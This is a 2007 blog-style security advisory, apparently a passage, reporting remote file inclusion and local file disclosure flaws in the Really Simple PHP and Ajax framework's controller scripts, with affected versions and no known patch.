Multiple vulnerabilities reported in Really Simple PHP and Ajax
Filed in archive AJAX by gautam on April 05, 2007
in the case of Really Simple PHP and Ajax or RSPA which hackers could exploit for executing arbitrary commands. This is a high risk vulnerability which can be remotely exploited. The first security issue is due to input validation errors in framework/Controller_v5.php and framework/Controller_v4.php scripts while processing of _IncludeFilePHPClass and _ClassPath parameters which remote attackers could exploit for inclusion of malicious scripts and execution of arbitrary commands. The second one is caused due to input validation errors in the framework/Controller_v5.php and framework/Controller_v4.php scripts while processing of the __class parameter which remote hackers could exploit for including or disclosing the local file contents with the privileges of the web server.
RSPA 2007-03-23 and earlier versions have been affected by the vulnerability. No details are available as of now regarding any official patch for plugging the hole.
Permalink: Multiple vulnerabilities reported in Really Simple PHP and Ajax
Tags:
RSPA Really Simple PHP and Ajax security vulnerability ajax really+simple
Trackback: http://www.creative-weblogging.com/cgi-bin/mt-tb.pl/61744
